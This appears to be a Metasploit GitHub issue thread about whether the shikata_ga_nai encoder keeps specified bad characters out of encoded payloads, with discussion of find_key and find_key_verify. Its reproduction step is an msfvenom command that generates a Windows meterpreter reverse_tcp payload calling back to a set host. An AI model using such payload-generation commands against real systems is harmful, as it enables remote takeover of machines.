### ISSUE TITLE
does badchar still used by shikata_ga_nai ?

### ISSUE THREAD

**Issue by agix** [rapid7/metasploit-framework#7011]
## Steps to reproduce

Generate multiple payload with badchar like `for i in {1..100}; do ./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80 LHOST=192.168.100.14 -e x86/shikata_ga_nai -f python -b '\xbd'; done`

failed some time.

## Expected behavior

Specified badchar should not appear in the encoded payload.

## Further infos

reading source code, firstly I don't understand very well what `find_key` is doing in `lib/msf/core/encoder.rb`

then I think shikata_ga_nai (and other encoders) should implement `find_key_verify` to prevent it to return true everytime.

Maybe I'm missing something but I want to write x64 encoder and I wonder if I have to recode the function to find a valid key myself or try to use an already existing one (but shikata_ga_nai seems to not taking care of badchar anymore...).

**Comment by agix** [comment]
Ok, I should be wrong, shikata_ga_nai use the XorAdditiveFeedback find_key method but it still fail sometimes with some specific badchar.

**Comment by dmohanty-r7** [comment]
@agix, you are correct… encoders such as shikata_ga_nai should implement find_key_verify to correctly account for bad characters. It appears the only encoder that actually does implement find_key_verify is `encoders/sparc/longxor_tag.rb`. find_key_verify is difficult to implement, but it would be ideal for you to override if you were to write your own encoder. If you do not you will have to rely on retrying similar to example you have provided. As you can see in https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/poly/block.rb#L259, generate is attempted 128 times, and if it fails, if bad characters are included in each of those 128 tries. Long story short, you are correct, find_key_verify should ideally be implemented in encoder implementations. They historically have not been implemented however due to the probabilistic/difficult-to-implement nature of the problem.

**Comment by agix** [comment]
Actually I think shikata_ga_nai use `find_key` from `Msf::Encoder::XorAdditiveFeedback` and never call `find_key_verify` so the key is made to prevent badchar in the payload. If it fails sometimes, I think it's because polymorphism and the badchar appears in the decoder stub (where badchars are not checked).

Nevermind I think we can close the issue. Sorry about that !
